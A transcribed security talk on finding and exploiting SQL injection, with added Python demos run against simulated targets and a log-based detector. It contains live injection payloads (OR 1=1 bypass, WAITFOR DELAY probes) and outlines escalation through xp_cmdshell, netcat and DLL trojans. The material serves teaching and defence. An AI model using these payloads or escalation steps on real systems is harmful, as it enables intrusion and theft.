SQL Injection

1. SQL Injection ~ Finding SQL Injection problems in 34 minutes
   Daniel Uriah Clemens

2. SQL Injection ~ Big Ideas
   These four attitudes will help us on our journey:
   1. Courage: be a hunter for information!
   2. Humility: remember that you, too, must ask questions!
   3. Faith: the vulnerabilities exist; you must discover them!
   4. Perseverance: running a race takes endurance, and so does exploiting vulnerabilities.

3. SQL Injection ~ Goals for this talk
   - Overview of SQL Injection (what is SQL Injection?)
   - How to identify SQL Injection problems
   - Impacts of SQL Injection
   - Attack patterns
   - Conclusion and demo (if time permits)

4. SQL Injection ~ Overview: What is SQL Injection? Where does it take place?
   SQL Injection takes place in a few places:
   - Input accepted from a website and passed, unescaped, into a query against a backend database.
   - Stored procedures within a database that build dynamic SQL from their arguments.

5. SQL Injection ~
   Daniel Uriah Clemens, PacketNinjas L.L.C

6. SQL Injection ~ How to identify injection points?
   Methodology
   - Identify how the web application works.
     - Does it operate solely on POSTs from the client?
     - Does it generate dynamic content on the server side?
     - Remember: asking the correct questions gets you the prize!
     - Which parameters within the website can be manipulated?

7. SQL Injection ~ Generic Checklist
   1) Mirror the website. Identify all comments in the code (HTML or JavaScript) and learn how things work.
   2) Identify the web application platform.
   3) Identify how the web application works.
   4) GETs: identify the variables passed to the application server or database.
   5) POSTs: track down every input passed to the server within a POST, and map out the input types you want to look at.
   6) Start fuzzing the input with the power of the single quote ( ' ).

8. SQL Injection ~ Tools to aid you
   - Brain
   - HTTP reference guide
   - HTTrack
   - SQL query analyzers
   - Web proxies
     - @stake WebProxy
     - ImmunitySec SPIKE Proxy
     - WebScarab
     - Paros Proxy

9. SQL Injection ~ Example: server-side input

10. SQL Injection ~ Response
   - Map out responses.
   - If there aren't any responses, don't give up!
   - Look for client-side input validation. If it exists, take it out of the equation with an HTML editor, a hex editor, or a proxy server.
   - If there were no responses, work blindly with WAITFOR statements to see whether your SQL syntax is being executed:
     ' OR 1 = 1 '+' waitfor delay '0:0:03' --
     ' SELECT * '||' waitfor delay '0:0:03' --
     (WAITFOR DELAY is Transact-SQL, so it only works against Microsoft SQL Server; '+' is that server's string concatenation operator, while '||' is the ANSI/Oracle form. Pick the variant that matches the backend you suspect, and look for the response arriving about three seconds late.)

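The time-based blind check this slide describes, written out as an added example (this is not code from the deck). It measures how long a control request and a WAITFOR DELAY probe take and only reports injection when every probe sample is slower than the baseline by most of the requested delay, which is what keeps one slow network round trip from producing a false positive. The target here is a constructed stand-in that sleeps when a WAITFOR DELAY reaches it (an assumption standing in for a real MSSQL-backed page); against a real site you would replace `simulated_vulnerable` with a function that sends the HTTP request and returns when the response arrives.

```python
import re
import statistics
import time


def make_payloads(delay_s):
    """Probe with a real WAITFOR DELAY and a control that is identical but waits zero seconds.
    Transact-SQL takes the delay as 'hh:mi:ss[.mmm]'; 0.2 becomes '0:0:00.200'."""
    probe = f"'; WAITFOR DELAY '0:0:{delay_s:06.3f}' --"
    control = "'; WAITFOR DELAY '0:0:00.000' --"
    return probe, control


def timed(send, payload):
    """Send one payload through `send` and return the elapsed wall-clock seconds."""
    start = time.perf_counter()
    send(payload)
    return time.perf_counter() - start


def is_time_injectable(send, probe, control, delay_s, samples=3):
    """True only if every probe sample exceeds the median control time by at least
    80% of delay_s.  Several samples, all of which must pass, defeat network jitter."""
    baseline = statistics.median(timed(send, control) for _ in range(samples))
    threshold = baseline + 0.8 * delay_s
    return all(timed(send, probe) > threshold for _ in range(samples))


# --- constructed stand-ins for the web application (assumptions, not a real target) ---
_WAITFOR = re.compile(r"WAITFOR DELAY '(\d+):(\d+):([\d.]+)'", re.I)


def simulated_vulnerable(payload):
    """Concatenates the value into its SQL, so a WAITFOR in the input really runs
    (simulated here by sleeping for the requested time)."""
    m = _WAITFOR.search(payload)
    if m:
        hours, minutes, seconds = m.groups()
        time.sleep(int(hours) * 3600 + int(minutes) * 60 + float(seconds))
    return "<html>ok</html>"


def simulated_fixed(payload):
    """Binds the value as a parameter: the WAITFOR is just data and never executes."""
    return "<html>ok</html>"


if __name__ == "__main__":
    probe, control = make_payloads(0.2)
    print("vulnerable:", is_time_injectable(simulated_vulnerable, probe, control, 0.2))
    print("fixed:     ", is_time_injectable(simulated_fixed, probe, control, 0.2))
```

Against a real target use a delay of several seconds, as the slide does, so that the signal clears normal response-time variance; the 0.2 s here only keeps the simulation quick.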
11. SQL Injection ~ Finding SQL injection
   Once you have found places that are processing or pulling data from a database...
   1) Test injection against the back-end database.
      - Straightforward injection: enter your single quotes ( ' ) and look for exceptions.
        user = joe ' OR 1 = 1 -- sp_passwd
        pass = whateveriwant
      - Blind injection: enter your single quotes with SQL delays.
        '; waitfor delay '0:0:10' --

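The straightforward check from this slide as an added, runnable example (not code from the deck): a login query built by string concatenation, the same query with bound parameters, and the quote probe that tells them apart. The in-memory SQLite database, its rows and the password values are constructed for the example; SQLite stands in for whatever backend the site uses, and the `joe' OR 1 = 1 --` / `whateveriwant` pair is the slide's own.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the site's backend database (assumption)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user TEXT, pass TEXT, role TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [("joe", "s3cret", "user"), ("dbo", "hunter2", "admin")])
    return db


def vulnerable_login(db, user, password):
    """The pattern the deck attacks: the statement is built by concatenation, so a
    quote in the input ends the literal and everything after it becomes SQL."""
    sql = ("SELECT user, role FROM users WHERE user = '" + user
           + "' AND pass = '" + password + "'")
    return db.execute(sql).fetchall()


def safe_login(db, user, password):
    """The same query with bound parameters: input can change values, never structure."""
    sql = "SELECT user, role FROM users WHERE user = ? AND pass = ?"
    return db.execute(sql, (user, password)).fetchall()


def probe_quote(db, login, user):
    """Step 1 from the slide: append a single quote and look for a database exception.
    Returns the error text if the quote broke the statement, None if it was harmless."""
    try:
        login(db, user + "'", "x")
        return None
    except sqlite3.OperationalError as exc:
        return str(exc)


if __name__ == "__main__":
    db = make_db()
    print(probe_quote(db, vulnerable_login, "joe"))  # database error: the quote reached the parser
    print(probe_quote(db, safe_login, "joe"))        # None: the quote was just data
    print(vulnerable_login(db, "joe' OR 1 = 1 --", "whateveriwant"))  # every row, no password needed
    print(safe_login(db, "joe' OR 1 = 1 --", "whateveriwant"))        # []
```

The `--` comments out the password clause, so `OR 1 = 1` turns the WHERE into a tautology and the vulnerable version returns every account; the parameterised version treats the whole string as a user name that does not exist.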
12. SQL Injection ~ Exploiting SQL Injection
   - The goal is to find out where you have landed in the SQL statement.
   - Usually this is a SELECT statement. How do you find out where you are in the SQL statement?
   - What can you do with this once you have found where you land in the SQL statement?

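One systematic way to answer "where did I land?", added here as an example that is not from the deck. Instead of the concatenation trick the later slides use, it sends a true/false pair for each candidate context (numeric, quoted string, quoted string inside parentheses): the candidate whose true variant reproduces the baseline response and whose false variant changes it, without a database error, is the one that closes the context correctly. The three query templates, the SQLite table and the `widget`/`gadget` rows are constructed assumptions standing in for the unknown server-side statement.

```python
import sqlite3

# Constructed stand-ins for how an application might embed the value in its
# SELECT (assumptions).  The tester does not know which one is in use.
TEMPLATES = {
    "number":       "SELECT name FROM items WHERE id = {v}",
    "string":       "SELECT name FROM items WHERE name = '{v}'",
    "paren_string": "SELECT name FROM items WHERE (name = '{v}')",
}

# Each candidate closes one context, then appends a condition that is true in one
# variant and false in the other.  Order matters: a parenthesised string context
# also accepts the plain string pair, so the more specific candidate goes first.
CANDIDATES = [
    ("paren_string", "') AND ('1'='1", "') AND ('1'='2"),
    ("string",       "' AND '1'='1",   "' AND '1'='2"),
    ("number",       " AND 1=1",       " AND 1=2"),
]


def _seed_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE items (id INTEGER, name TEXT)")
    db.executemany("INSERT INTO items VALUES (?, ?)", [(1, "widget"), (2, "gadget")])
    return db


def make_app(template):
    """Return a query function that embeds the raw value into `template` (vulnerable by design)."""
    db = _seed_db()

    def query(value):
        return db.execute(template.format(v=value)).fetchall()
    return query


def make_safe_app():
    """Same lookup with a bound parameter: no candidate will ever match."""
    db = _seed_db()

    def query(value):
        return db.execute("SELECT name FROM items WHERE name = ?", (value,)).fetchall()
    return query


def find_context(query, known_value):
    """Locate where the input lands: the candidate whose true variant reproduces the
    baseline response and whose false variant changes it, with no database error."""
    baseline = query(known_value)
    for name, true_suffix, false_suffix in CANDIDATES:
        try:
            same = query(known_value + true_suffix) == baseline
            differs = query(known_value + false_suffix) != baseline
        except sqlite3.OperationalError:
            continue  # this terminator broke the statement: wrong context
        if same and differs:
            return name
    return None


if __name__ == "__main__":
    for name, template in TEMPLATES.items():
        value = "1" if name == "number" else "widget"
        print(name, "->", find_context(make_app(template), value))
    print("parameterised ->", find_context(make_safe_app(), "widget"))
```

The same loop works over HTTP by replacing `query` with a function that fetches the page and returns its body; the comparison is then between response bodies (after stripping anything that changes per request, such as timestamps) rather than between result sets.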
13. SQL Injection ~ What can we do with this?

14. SQL Injection ~ Example: server-side injection

15. SQL Injection ~ Recon (Microsoft)
   - Identify the server patch level with @@version (remember this is probably SELECT @@version --). Blind variants include:
     ); @@version "||" select user waitfor delay '0:0:10'--
   - Output:
     Microsoft SQL Server 2000 - 8.00.194 (Intel X86) Aug 6 2000 00:57:48 Copyright (c) 1988-2000 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
   - Read the banner carefully: 8.00.194 is the unpatched RTM build of SQL Server 2000, and the "Service Pack 4" shown belongs to the Windows 2000 host, not to SQL Server.

16. SQL Injection ~ Escalation Step 2 (Identify the DB user)
   - Remember: the key is where you land in the SELECT statement.
   - user--   (the dashes are adjacent; the slide spaced them out only to make them visible)
   - If the user is 'dbo': SELECT @@version '+' select user --
   - '+' select user --   (concatenate your request onto the existing statement)
   If everything went well and our result was 'dbo', then we can expand our privileges to do anything we want!
   ('dbo' is the database owner, which is what a sysadmin login such as sa maps to; the steps that follow need the sysadmin server role itself, so confirm it with SELECT IS_SRVROLEMEMBER('sysadmin'), which returns 1 for a sysadmin login.)

17. SQL Injection ~ Basic System Compromise
   1) Execute stored procedures to download a file from your hostile server,
   OR
   2) If you are firewalled...
   - The stored procedures include xp_cmdshell, an extended stored procedure that runs an operating-system command under the SQL Server service account.

18. SQL Injection ~
   - Upload a binary into a table, have it flushed to disk, and then start netcat.
   - This is tricky because you have to break your binary into parts: a varchar or varbinary column holds at most 8,000 bytes in SQL Server 2000, so the file goes in as chunks and is reassembled on the host.

19. SQL Injection ~ System compromise
   - Question: what if we turned off the stored procedures?
   - Answer: it doesn't matter if I am dbo; I can turn them on again.
     exec sp_addextendedproc N'xp_cmdshell', N'xplog70.dll'
     This re-registers the extended stored procedure (sp_addextendedproc itself requires the sysadmin role). We could also be sneaky and load any DLL we want into the database and have it work as a trojan or something...

20. SQL Injection ~ Other thoughts
   1) Most publicly accessible databases are clustered, so you have just compromised every node in the cluster.
   2) If the database isn't Microsoft but Oracle... well, it gets even better.

21. SQL Injection ~ ORACLE Injection
   - Follow our methodology:
   - Find insertion points
   - Figure out where we land in the SELECT statement
   - Verify the database type
   - Utilize stored procedures (Oracle ships a very large number of them; I think above 900)
   - OR use java.io through Oracle's Java stored procedures, OR overflow a stored procedure in Oracle, OR SQL-inject within a stored procedure in Oracle.

22. SQL Injection ~ Other attack patterns
   - Watch the web logs for large numbers of small requests.
   - Watch the web logs for unusual HTTP status codes, anything other than 200 OK:
     - 302 redirects or 500 server errors
     - Persistent connections to a web application
     - End users spidering the website
     - Database crashes

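The three log signals on this slide (bursts of small requests, non-200 status codes, and the quote-fuzzing itself) turned into a small detector, added here as an example that is not part of the deck. It parses combined-format access log lines, tallies per client, and reports who trips which rule. The log lines are constructed for the example (one scanner running the deck's own probes, one ordinary visitor); the thresholds are assumptions to tune against your own traffic.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Combined log line: ip ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) (?P<size>\d+|-)'
)
# The metacharacter and T-SQL keywords the deck's own probes rely on.
SQLI_RE = re.compile(r"'|\bwaitfor\b|\bunion\b.*\bselect\b|@@version|xp_cmdshell|sp_addextendedproc", re.I)


def parse_line(line):
    """Return the fields of one log line, or None if it is not in combined format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["size"] = 0 if rec["size"] == "-" else int(rec["size"])
    rec["req"] = unquote(rec["req"])  # decode %27 etc. so the quote is visible
    return rec


def summarize(lines):
    """Per-client counts: requests, responses that were not 200, SQL-looking requests, bytes served."""
    stats = defaultdict(lambda: {"requests": 0, "non200": 0, "sqli": 0, "bytes": 0})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        s = stats[rec["ip"]]
        s["requests"] += 1
        s["bytes"] += rec["size"]
        if rec["status"] != 200:
            s["non200"] += 1
        if SQLI_RE.search(rec["req"]):
            s["sqli"] += 1
    return dict(stats)


def flag(stats, min_requests=5, error_ratio=0.3, small_bytes=1024):
    """Map each suspicious client to its reasons, one per signal on the slide (thresholds are assumptions)."""
    flagged = {}
    for ip, s in stats.items():
        reasons = []
        if s["sqli"]:
            reasons.append(f"{s['sqli']} request(s) carrying quotes or T-SQL keywords")
        if s["requests"] >= min_requests:
            if s["non200"] / s["requests"] >= error_ratio:
                reasons.append(f"{s['non200']} of {s['requests']} responses were not 200")
            if s["bytes"] / s["requests"] < small_bytes:
                reasons.append(f"{s['requests']} requests averaging {s['bytes'] // s['requests']} bytes")
        if reasons:
            flagged[ip] = reasons
    return flagged


# Constructed sample log (not from any real server): one scanner, one ordinary visitor.
SAMPLE_LOG = """\
10.0.0.5 - - [14/Mar/2005:10:01:01 -0600] "GET /login.asp?user=joe%27+OR+1%3D1+-- HTTP/1.1" 500 311 "-" "Mozilla/4.0"
10.0.0.5 - - [14/Mar/2005:10:01:02 -0600] "GET /login.asp?user=joe%27%3Bwaitfor+delay+%270:0:10%27-- HTTP/1.1" 200 311 "-" "Mozilla/4.0"
10.0.0.5 - - [14/Mar/2005:10:01:03 -0600] "GET /products.asp?id=1%27 HTTP/1.1" 500 302 "-" "Mozilla/4.0"
10.0.0.5 - - [14/Mar/2005:10:01:04 -0600] "GET /products.asp?id=1%27%2B%27select+%40%40version-- HTTP/1.1" 500 302 "-" "Mozilla/4.0"
10.0.0.5 - - [14/Mar/2005:10:01:05 -0600] "GET /products.asp?id=2 HTTP/1.1" 302 0 "-" "Mozilla/4.0"
192.168.1.20 - - [14/Mar/2005:10:02:00 -0600] "GET /index.asp HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
192.168.1.20 - - [14/Mar/2005:10:02:05 -0600] "GET /products.asp?id=2 HTTP/1.1" 200 6140 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for ip, reasons in flag(summarize(SAMPLE_LOG.splitlines())).items():
        print(ip, "->", "; ".join(reasons))
```

The quote rule on its own is noisy (names like O'Brien contain one), which is why the status-code and request-size rules are kept separate: a client that trips two or three of them at once is the one worth pulling the full request history for.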
23. SQL Injection ~ Conclusion
   - We have scratched the surface with the basics of SQL injection.
   - Next time we can talk about other things:
     - Generating a web application assessment program
     - Advanced exploitation techniques and tricks

24. SQL Injection ~ Thank you!
   - Special thanks to God for life, joy, strength and hope!
   - Everyone at work that puts up with me!
   - InfraGard members that let me share ideas!